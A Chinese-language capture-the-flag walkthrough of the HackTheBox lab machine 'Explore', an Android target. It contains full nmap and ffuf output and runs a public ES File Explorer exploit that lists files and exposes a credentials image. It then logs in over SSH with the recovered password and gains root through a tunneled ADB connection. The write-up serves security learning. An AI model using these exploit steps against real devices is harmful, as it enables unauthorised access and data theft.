Hackthebox - Explore
靶场信息
靶场类型
信息搜集
首先使用nmap进行信息搜集
nmap -A -sS -sC -sV -p- 10.10.10.247
┌──(root💀root)-[~/Desktop]
└─# nmap -A -sS -sC -sV -p- 10.10.10.247
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-06 17:01 CST
Nmap scan report for explore.htb (10.10.10.247)
Host is up (0.25s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
38237/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Tue, 06 Jul 2021 09:28:06 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Tue, 06 Jul 2021 09:28:06 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Tue, 06 Jul 2021 09:28:11 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Tue, 06 Jul 2021 09:28:28 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Tue, 06 Jul 2021 09:28:11 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Tue, 06 Jul 2021 09:28:28 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Tue, 06 Jul 2021 09:28:29 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Tue, 06 Jul 2021 09:28:29 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
42135/tcp open http ES File Explorer Name Response httpd
|_http-server-header: ES Name Response Server
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.91%I=7%D=7/6%Time=60E41F41%P=x86_64-pc-linux-gnu%r(NUL
SF:L,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port38237-TCP:V=7.91%I=7%D=7/6%Time=60E41F41%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,AA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Tue,\x200
SF:6\x20Jul\x202021\x2009:28:06\x20GMT\r\nContent-Length:\x2022\r\nContent
SF:-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r
SF:\nInvalid\x20request\x20line:\x20")%r(GetRequest,5C,"HTTP/1\.1\x20412\x
SF:20Precondition\x20Failed\r\nDate:\x20Tue,\x2006\x20Jul\x202021\x2009:28
SF::06\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,B5,"HTTP/1\.
SF:0\x20501\x20Not\x20Implemented\r\nDate:\x20Tue,\x2006\x20Jul\x202021\x2
SF:009:28:11\x20GMT\r\nContent-Length:\x2029\r\nContent-Type:\x20text/plai
SF:n;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nMethod\x20not\x20
SF:supported:\x20OPTIONS")%r(RTSPRequest,BB,"HTTP/1\.0\x20400\x20Bad\x20Re
SF:quest\r\nDate:\x20Tue,\x2006\x20Jul\x202021\x2009:28:11\x20GMT\r\nConte
SF:nt-Length:\x2039\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\
SF:nConnection:\x20Close\r\n\r\nNot\x20a\x20valid\x20protocol\x20version:\
SF:x20\x20RTSP/1\.0")%r(Help,AE,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDat
SF:e:\x20Tue,\x2006\x20Jul\x202021\x2009:28:28\x20GMT\r\nContent-Length:\x
SF:2026\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:
SF:\x20Close\r\n\r\nInvalid\x20request\x20line:\x20HELP")%r(SSLSessionReq,
SF:DD,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Tue,\x2006\x20Jul\x2
SF:02021\x2009:28:28\x20GMT\r\nContent-Length:\x2073\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nInvalid\x
SF:20request\x20line:\x20\x16\x03\0\0S\x01\0\0O\x03\0\?G\?\?\?,\?\?\?`~\?\
SF:0\?\?{\?\?\?\?w\?\?\?\?<=\?o\?\x10n\0\0\(\0\x16\0\x13\0")%r(TerminalSer
SF:verCookie,CA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Tue,\x2006
SF:\x20Jul\x202021\x2009:28:29\x20GMT\r\nContent-Length:\x2054\r\nContent-
SF:Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\
SF:nInvalid\x20request\x20line:\x20\x03\0\0\*%\?\0\0\0\0\0Cookie:\x20mstsh
SF:ash=nmap")%r(TLSSessionReq,DB,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDa
SF:te:\x20Tue,\x2006\x20Jul\x202021\x2009:28:29\x20GMT\r\nContent-Length:\
SF:x2071\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection
SF::\x20Close\r\n\r\nInvalid\x20request\x20line:\x20\x16\x03\0\0i\x01\0\0e
SF:\x03\x03U\x1c\?\?random1random2random3random4\0\0\x0c\0/\0");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/6%OT=2222%CT=1%CU=35534%PV=Y%DS=2%DC=T%G=Y%TM=60E41F
OS:BE%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)SE
OS:Q(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW6%O2=M54DST11NW6%
OS:O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW6%O6=M54DST11)WIN(W1=FFFF%W2
OS:=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M54DNNS
OS:NW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%
OS:DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%
OS:RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Device: phone
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 253.69 ms 10.10.14.1
2 253.76 ms explore.htb (10.10.10.247)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 979.56 seconds
咱们发现,分别在38237、42135和59777上运行了HTTP服务
咱们分别去看看
这边提示是空响应?那做个fuzz看看
ffuf -u http://10.10.10.247:59777/FUZZ -w /usr/share/wordlists/dirb/big.txt -t 100 -e .php,.html
┌──(root💀root)-[~/Desktop]
└─# ffuf -u http://10.10.10.247:59777/FUZZ -w /usr/share/wordlists/dirb/big.txt -t 100 -e .php,.html
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.10.247:59777/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
acct [Status: 301, Size: 65, Words: 3, Lines: 1]
bin [Status: 301, Size: 63, Words: 3, Lines: 1]
cache [Status: 301, Size: 67, Words: 3, Lines: 1]
config [Status: 301, Size: 69, Words: 3, Lines: 1]
d [Status: 301, Size: 59, Words: 3, Lines: 1]
data [Status: 301, Size: 65, Words: 3, Lines: 1]
dev [Status: 301, Size: 63, Words: 3, Lines: 1]
etc [Status: 301, Size: 63, Words: 3, Lines: 1]
init [Status: 403, Size: 31, Words: 4, Lines: 1]
lib [Status: 301, Size: 63, Words: 3, Lines: 1]
mnt [Status: 301, Size: 63, Words: 3, Lines: 1]
oem [Status: 301, Size: 63, Words: 3, Lines: 1]
proc [Status: 301, Size: 65, Words: 3, Lines: 1]
product [Status: 301, Size: 71, Words: 3, Lines: 1]
sbin [Status: 301, Size: 65, Words: 3, Lines: 1]
storage [Status: 301, Size: 71, Words: 3, Lines: 1]
sys [Status: 301, Size: 63, Words: 3, Lines: 1]
system [Status: 301, Size: 69, Words: 3, Lines: 1]
vendor [Status: 301, Size: 69, Words: 3, Lines: 1]
:: Progress: [61407/61407] :: Job [1/1] :: 199 req/sec :: Duration: [0:05:35] :: Errors: 0 ::
看到这个目录结构,我感觉这HTTP服务是运行在根目录下的
然后我又去看了一下这台靶机的系统,Android系统,咱们去查找一下Android的敏感文件试试。
经过确认,确实是存在文件读取的漏洞,但我不太了解Android,那应该怎么办呢?简单!摇人儿!在询问玩Android的朋友怎么搞以后,又经过大量的资料查找以及fuzz以后,得到了答案
这里/sdcard/提示
No directory listing.
,但/sdcard1/提示
404 file not found.
那么,这里就可以确定,/sdcard/这个目录是存在的了,咱们继续往下做
漏洞利用
在我愚蠢的对50777端口的Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older进行了大量的搜索以后,我才看到一个关键词Minecraft,我丢,这不就是我的世界服务器吗?放弃
然后把眼光放在了
42134
端口上的
ES File Explorer Name Response httpd
上
好家伙,这直接就找到了一个exploit >https://www.exploit-db.com/exploits/50070 该exploit提供了不少可执行命令
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
使用exploit提供listPics指令获取一些图片文件
python3 exploit.py listPics 10.10.10.247
最终在
http://10.10.10.247:59777/storage/emulated/0/DCIM/creds.jpg
下找到了一个账号密码
username = kristi
password = Kr1sT!5h@Rp3xPl0r3!
咱们使用ssh进行登录
ssh kristi@10.10.10.247 -p 2222
成功拿到shell,咱们找找看文件
在
/sdcard/
目录下找到了
user.txt
文件,成功拿到user权限的flag,同时想到,咱们是否可直接利用
59777
端口利用文件读取直接读取到该flag呢?
http://10.10.10.247:59777/sdcard/user.txt
事实证明,是可以的
权限提升
咱们目前没利用过且无法直接利用的端口只有5555端口了,我估计突破口在这上面,咱们先使用ssh给它转发出来吧
ssh -L 5555:127.0.0.1:5555 kristi@10.10.10.247 -p 2222 -N -v -v
代理上以后,咱们来分析一下啊。
既然这台Android连接着sd卡,那么应该是开启着ADB调试桥的,也就是说咱们或许可以直接使用ADB进行破解。
说来也巧,这个技巧还是我之前闲着没事儿研究破解Android密码的时候恰巧看到的。
adb connect 127.0.0.1:5555
连接成功后,使用
adb -s 127.0.0.1:5555 shell
登入shell
成功获得root权限
使用find / -name root.txt指令,成功获得root文件位置/data/root.txt
成功拿到root权限的flag文件
